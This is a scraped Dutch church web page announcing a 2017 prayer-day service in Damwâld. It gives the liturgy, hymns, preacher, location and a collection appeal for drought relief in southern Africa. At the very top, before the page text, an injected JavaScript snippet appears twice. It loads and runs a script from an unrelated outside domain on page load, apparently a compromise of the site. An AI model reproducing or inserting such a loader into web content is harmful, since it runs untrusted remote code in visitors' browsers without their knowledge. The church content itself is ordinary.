;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Biddag voor Gewas en Arbeid - PKN Damwâld
woensdag 8 maart 2017
19:30 uur

Biddag voor Gewas en Arbeid

Thema: “Stille momenten met God”

Informatie

Voorganger:Ds. G. Timmer
Organist:Nienke van der Heide-Visser
Thema:“Stille momenten met God”
Liturgie
Lied voor de dienst Gezang 465: 1, 2 en 3
Welkom en mededelingen
Intochtslied Psalm 65: 1 en 5
Stil gebed, bemoediging en groet
Loflied ELB 241: 1, 2 en 3
Gebed
We lezen: Markus 1: 21-38
We zingen: Gezang 329: 1, 2 en 3
Verkondiging : “Stille momenten met God”
We zingen: ELB 377: 1, 2 en 3
Gebeden (voorbeden afgewisseld door momenten van stilte)
Collecte
Slotlied Gezang 393: 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Noodhulp zuidelijk Afrika

Al enkele jaren worstelt het zuiden van Afrika met droogte én tegelijk hevige overstromingen. In het laatste regenseizoen viel in veel landen nauwelijks tot geen regen. In het voorjaar van 2016 werd de mais geoogst, maar dat was zo weinig dat de eerste voedselhulp al in juni 2016 op gang kwam. Onder de landen die het meest getroffen zijn, bevinden zich er vier waar de GZB via het diaconale programma Project 10 27 lokale kerken steunt om met Woord en daad aanwezig te zijn in de samenleving: Malawi, Zimbabwe, Mozambique en Namibië. Helaas wordt de voedselschaarste in deze Afrikaanse regio ernstiger en de hulp urgenter. Miljoenen mensen lijden door ernstige tekorten. Project 10 27 wil bestaande projecten uitbreiden en nieuwe starten. Hiervoor is nog eens minimaal € 75.000,00 nodig

Tweede collecte: Kerk
Uitganscollecte: Bidstondcollecte